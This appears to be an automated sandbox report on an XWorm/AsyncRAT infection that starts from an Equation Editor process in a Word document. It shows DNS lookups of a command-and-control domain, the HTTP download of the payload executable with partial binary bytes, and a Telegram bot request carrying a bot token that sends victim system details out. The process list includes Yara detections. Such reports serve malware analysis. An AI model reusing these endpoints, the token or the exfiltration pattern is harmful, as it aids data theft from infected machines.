                                                            Sep 25, 2024 08:33:23.874206066 CEST8.8.8.8192.168.2.220xfc20No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.948216915 CEST8.8.8.8192.168.2.220x8305No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.955164909 CEST8.8.8.8192.168.2.220x8305No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.961615086 CEST8.8.8.8192.168.2.220x8305No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.968224049 CEST8.8.8.8192.168.2.220x8305No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.974854946 CEST8.8.8.8192.168.2.220x8305No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.088845968 CEST8.8.8.8192.168.2.220x16caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.096276999 CEST8.8.8.8192.168.2.220x16caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.103447914 CEST8.8.8.8192.168.2.220x16caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.111156940 CEST8.8.8.8192.168.2.220x16caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.117741108 CEST8.8.8.8192.168.2.220x16caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:31.695369005 CEST8.8.8.8192.168.2.220x1b36No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:31.702598095 CEST8.8.8.8192.168.2.220x1b36No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.855073929 CEST8.8.8.8192.168.2.220x66f5No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.861515045 CEST8.8.8.8192.168.2.220x66f5No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.867710114 CEST8.8.8.8192.168.2.220x66f5No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.874275923 CEST8.8.8.8192.168.2.220x66f5No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.881453991 CEST8.8.8.8192.168.2.220x66f5No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.122250080 CEST8.8.8.8192.168.2.220xb2e8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.128812075 CEST8.8.8.8192.168.2.220xb2e8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.135421038 CEST8.8.8.8192.168.2.220xb2e8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.141949892 CEST8.8.8.8192.168.2.220xb2e8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.149023056 CEST8.8.8.8192.168.2.220xb2e8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.285469055 CEST8.8.8.8192.168.2.220x6a2fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.293798923 CEST8.8.8.8192.168.2.220x6a2fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.302068949 CEST8.8.8.8192.168.2.220x6a2fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.309197903 CEST8.8.8.8192.168.2.220x6a2fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.317441940 CEST8.8.8.8192.168.2.220x6a2fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.428134918 CEST8.8.8.8192.168.2.220x6570No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.434606075 CEST8.8.8.8192.168.2.220x6570No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.441550970 CEST8.8.8.8192.168.2.220x6570No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.448230982 CEST8.8.8.8192.168.2.220x6570No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.454664946 CEST8.8.8.8192.168.2.220x6570No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.568702936 CEST8.8.8.8192.168.2.220x64ecNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.575417995 CEST8.8.8.8192.168.2.220x64ecNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.582010031 CEST8.8.8.8192.168.2.220x64ecNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.588545084 CEST8.8.8.8192.168.2.220x64ecNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.598256111 CEST8.8.8.8192.168.2.220x64ecNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.713260889 CEST8.8.8.8192.168.2.220xe151No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.722094059 CEST8.8.8.8192.168.2.220xe151No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.731142044 CEST8.8.8.8192.168.2.220xe151No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.739804029 CEST8.8.8.8192.168.2.220xe151No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.748152971 CEST8.8.8.8192.168.2.220xe151No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.868042946 CEST8.8.8.8192.168.2.220x4150No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.878537893 CEST8.8.8.8192.168.2.220x4150No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:41.690030098 CEST8.8.8.8192.168.2.220x4c9aNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:41.697776079 CEST8.8.8.8192.168.2.220x4c9aNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.439063072 CEST8.8.8.8192.168.2.220x4dd1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.446183920 CEST8.8.8.8192.168.2.220x4dd1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.453152895 CEST8.8.8.8192.168.2.220x4dd1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.459619999 CEST8.8.8.8192.168.2.220x4dd1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.466051102 CEST8.8.8.8192.168.2.220x4dd1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.610697985 CEST8.8.8.8192.168.2.220xcb28No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.620230913 CEST8.8.8.8192.168.2.220xcb28No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.628459930 CEST8.8.8.8192.168.2.220xcb28No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.637023926 CEST8.8.8.8192.168.2.220xcb28No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.644186974 CEST8.8.8.8192.168.2.220xcb28No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.773216009 CEST8.8.8.8192.168.2.220x65c2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.780844927 CEST8.8.8.8192.168.2.220x65c2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.789196014 CEST8.8.8.8192.168.2.220x65c2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.795932055 CEST8.8.8.8192.168.2.220x65c2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.802463055 CEST8.8.8.8192.168.2.220x65c2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.465775967 CEST8.8.8.8192.168.2.220x5407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.475274086 CEST8.8.8.8192.168.2.220x5407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.482307911 CEST8.8.8.8192.168.2.220x5407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.488961935 CEST8.8.8.8192.168.2.220x5407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.495739937 CEST8.8.8.8192.168.2.220x5407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.322998047 CEST8.8.8.8192.168.2.220x82fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.331178904 CEST8.8.8.8192.168.2.220x82fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.338834047 CEST8.8.8.8192.168.2.220x82fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.346981049 CEST8.8.8.8192.168.2.220x82fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.355370045 CEST8.8.8.8192.168.2.220x82fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.477557898 CEST8.8.8.8192.168.2.220x831eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.485235929 CEST8.8.8.8192.168.2.220x831eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.492564917 CEST8.8.8.8192.168.2.220x831eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.499749899 CEST8.8.8.8192.168.2.220x831eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.506654978 CEST8.8.8.8192.168.2.220x831eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.631870985 CEST8.8.8.8192.168.2.220xb795No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.639082909 CEST8.8.8.8192.168.2.220xb795No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.647315025 CEST8.8.8.8192.168.2.220xb795No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.663157940 CEST8.8.8.8192.168.2.220xb795No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.675050974 CEST8.8.8.8192.168.2.220xb795No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.789160013 CEST8.8.8.8192.168.2.220x811bNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.795468092 CEST8.8.8.8192.168.2.220x811bNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.803347111 CEST8.8.8.8192.168.2.220x811bNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.809988022 CEST8.8.8.8192.168.2.220x811bNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.816546917 CEST8.8.8.8192.168.2.220x811bNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.930860996 CEST8.8.8.8192.168.2.220x9adbNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.937335014 CEST8.8.8.8192.168.2.220x9adbNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.944288969 CEST8.8.8.8192.168.2.220x9adbNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.950779915 CEST8.8.8.8192.168.2.220x9adbNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.957225084 CEST8.8.8.8192.168.2.220x9adbNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            • api.telegram.org
                                                            • 66.63.187.123
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.224916366.63.187.123803560C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 08:29:59.841695070 CEST316OUTGET /txt/vnobizxc.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 66.63.187.123
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 08:30:00.560942888 CEST1236INHTTP/1.1 200 OK
                                                            Server: nginx/1.26.2
                                                            Date: Wed, 25 Sep 2024 06:30:00 GMT
                                                            Content-Type: application/x-msdos-program
                                                            Content-Length: 434176
                                                            Connection: keep-alive
                                                            Last-Modified: Tue, 24 Sep 2024 14:41:49 GMT
                                                            ETag: "6a000-622de8165b3ca"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 75 7b be 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 96 06 00 00 08 00 00 00 00 00 00 66 b5 06 00 00 20 00 00 00 c0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 12 b5 06 00 4f 00 00 00 00 c0 06 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 0c 00 00 00 b4 a3 06 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELu{0f @ @Op H.textl `.rsrc@@.reloc@BFH;L+-g<s}s}}((*0Crp(+){o{oo&Xi2*0rp*0{o{o{o{o{o{(+(o(( s*(o!("&*n{&(#*0|{orp($,+2{
                                                            Sep 25, 2024 08:30:00.560972929 CEST1236INData Raw: 08 00 00 04 6f 1b 00 00 0a 12 00 28 25 00 00 0a 16 fe 01 0c 08 2c 19 00 02 7b 08 00 00 04 6f 26 00 00 0a 00 72 20 01 00 70 28 22 00 00 0a 26 00 06 16 fe 04 0d 09 2c 21 00 04 17 6f 27 00 00 0a 00 02 7b 12 00 00 04 03 74 32 00 00 01 72 64 01 00 70
                                                            Data Ascii: o(%,{o&r p("&,!o'{t2rdpo(*V{{o(***0|{orp($,+2{o(%,{o&r p("&,!o'{t2r
                                                            Sep 25, 2024 08:30:00.560987949 CEST1236INData Raw: 00 04 1f 79 1f 16 73 38 00 00 0a 6f 39 00 00 0a 00 02 7b 08 00 00 04 19 6f 3a 00 00 0a 00 02 7b 08 00 00 04 02 fe 06 06 00 00 06 73 3b 00 00 0a 6f 3c 00 00 0a 00 02 7b 08 00 00 04 02 fe 06 07 00 00 06 73 3d 00 00 0a 6f 3e 00 00 0a 00 02 7b 09 00
                                                            Data Ascii: ys8o9{o:{s;o<{s=o>{ s5o6{rpo7{ys8o9{o:{s;o<{s=o>{ s5o6{rpo
                                                            Sep 25, 2024 08:30:00.561000109 CEST1236INData Raw: 6f 4b 00 00 0a 00 02 28 4a 00 00 0a 02 7b 0e 00 00 04 6f 4b 00 00 0a 00 02 28 4a 00 00 0a 02 7b 0d 00 00 04 6f 4b 00 00 0a 00 02 28 4a 00 00 0a 02 7b 0c 00 00 04 6f 4b 00 00 0a 00 02 28 4a 00 00 0a 02 7b 0b 00 00 04 6f 4b 00 00 0a 00 02 28 4a 00
                                                            Data Ascii: oK(J{oK(J{oK(J{oK(J{oK(J{oK(J{oK(J{oK(J{oK(J{oK(J{oKrp(7rpo?s=(L{oM
                                                            Sep 25, 2024 08:30:00.561012030 CEST1236INData Raw: 01 fe 16 04 00 00 1b 6f 2a 00 00 0a 00 dc 72 24 05 00 70 12 00 28 5a 00 00 0a 28 65 00 00 0a 28 22 00 00 0a 26 2a 01 10 00 00 02 00 18 00 21 39 00 0f 00 00 00 00 13 30 01 00 0f 00 00 00 0b 00 00 11 00 73 13 00 00 06 0a 06 6f 66 00 00 0a 00 2a 00
                                                            Data Ascii: o*r$p(Z(e("&*!90sof*0+,{+,{o*(+*0Zs.}sg}sh} sh}!sh}"sh}#sh}$s.}%s.
                                                            Sep 25, 2024 08:30:00.561027050 CEST1236INData Raw: 40 00 00 0a 00 02 7b 26 00 00 04 02 fe 06 1f 00 00 06 73 3d 00 00 0a 6f 41 00 00 0a 00 02 7b 27 00 00 04 1f 14 1f 14 73 38 00 00 0a 6f 7c 00 00 0a 00 02 7b 27 00 00 04 6f 7d 00 00 0a 17 8d 5b 00 00 01 25 16 02 7b 28 00 00 04 a2 6f 7e 00 00 0a 00
                                                            Data Ascii: @{&s=oA{'s8o|{'o}[%{(o~{'s5o6{'r>po7{' s8o9{'o:{'r>po?{(rTpo{( s8o{(rpo{(
                                                            Sep 25, 2024 08:30:00.561042070 CEST1236INData Raw: 0a 00 00 02 16 7d 2b 00 00 04 02 7e 8d 00 00 0a 7d 2c 00 00 04 02 16 7d 2d 00 00 04 02 23 00 00 00 00 00 00 00 00 7d 2e 00 00 04 02 16 7d 2f 00 00 04 2a ba 02 28 50 00 00 0a 00 00 02 03 7d 2b 00 00 04 02 04 7d 2c 00 00 04 02 05 7d 2d 00 00 04 02
                                                            Data Ascii: }+~},}-#}.}/*(P}+},}-}.}/*0{-l{.Z+*0|+{+(+*j((s(*&(P*09~0,"rLp(l
                                                            Sep 25, 2024 08:30:00.561114073 CEST108INData Raw: 5a 08 6a 0c 0e 00 44 03 73 08 00 00 00 00 84 00 00 00 00 00 01 00 01 00 01 00 10 00 13 08 35 0d 41 00 01 00 01 00 00 00 10 00 09 0f 35 0d 61 00 13 00 12 00 01 00 10 00 22 08 35 0d 41 00 15 00 13 00 01 00 10 00 2e 00 35 0d 41 00 17 00 18 00 00 00
                                                            Data Ascii: ZjDs5A5a"5A.5Ad5a+)5a0-
                                                            Sep 25, 2024 08:30:00.561127901 CEST1236INData Raw: 00 00 10 00 10 0b c0 0b 61 00 30 00 2e 00 00 01 10 00 1b 0c c0 0b bd 00 32 00 34 00 01 00 b5 0b 7b 03 01 00 d4 0c 82 03 51 80 06 06 77 02 01 00 fd 0c 8a 03 01 00 07 0f 8e 03 01 00 5c 01 92 03 01 00 d8 02 96 03 01 00 fb 00 96 03 01 00 dd 0c 96 03
                                                            Data Ascii: a0.24{Qw\'^hovi}?"w]Qw$[e\
                                                            Sep 25, 2024 08:30:00.561145067 CEST1236INData Raw: 01 00 e0 09 00 00 02 00 da 05 00 00 01 00 20 06 00 00 01 00 ed 01 00 00 02 00 f0 02 00 00 01 00 e0 09 00 00 02 00 da 05 00 00 01 00 e0 09 00 00 02 00 da 05 00 00 01 00 20 06 00 00 01 00 e0 09 00 00 02 00 da 05 00 00 01 00 6c 0d 00 00 01 00 e0 09
                                                            Data Ascii: l ~
                                                            Sep 25, 2024 08:30:00.566009045 CEST1236INData Raw: 9f 04 2e 00 5b 00 9f 04 2e 00 63 00 bd 04 2e 00 6b 00 e7 04 2e 00 73 00 f4 04 49 00 9b 00 de 05 03 01 83 00 41 05 03 01 8b 00 3c 05 03 01 93 00 3c 05 23 01 93 00 3c 05 23 01 83 00 83 05 a0 05 7b 00 3c 05 3c 00 5c 00 60 00 98 00 b4 00 c2 00 30 01
                                                            Data Ascii: .[.c.k.sIA<<#<#{<<\`0{GLQz~F&LxRRX/01234/5O


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.2249164149.154.167.2204433804C:\Users\user\AppData\Roaming\obibingf24242.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 06:30:07 UTC485OUTGET /bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A04B2031D7209871FB96E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%207%20Professional%20%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Standard%20VGA%20Graphics%20Adapter%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 06:30:08 UTC388INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 25 Sep 2024 06:30:07 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 459
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-09-25 06:30:08 UTC459INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 33 34 32 31 35 37 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 6f 67 7a 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 69 74 79 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 39 38 35 30 38 38 38 38 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 2e 2e 2e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 69 74 79 30 7a 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 32 34 35 38 30 37 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20 56 35 2e 34 5d 5c 6e 5c 6e 4e
                                                            Data Ascii: {"ok":true,"result":{"message_id":937,"from":{"id":7503421576,"is_bot":true,"first_name":"logz","username":"obilityBot"},"chat":{"id":985088883,"first_name":"....","username":"obility0z","type":"private"},"date":1727245807,"text":"\u2620 [XWorm V5.4]\n\nN


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:02:29:55
                                                            Start date:25/09/2024
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13f990000
                                                            File size:1'423'704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:02:29:56
                                                            Start date:25/09/2024
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543'304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:02:30:00
                                                            Start date:25/09/2024
                                                            Path:C:\Users\user\AppData\Roaming\obibingf24242.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\obibingf24242.exe"
                                                            Imagebase:0x11e0000
                                                            File size:434'176 bytes
                                                            MD5 hash:A4CD1FF60C7B69DF5A061DF3365E60C7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 50%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

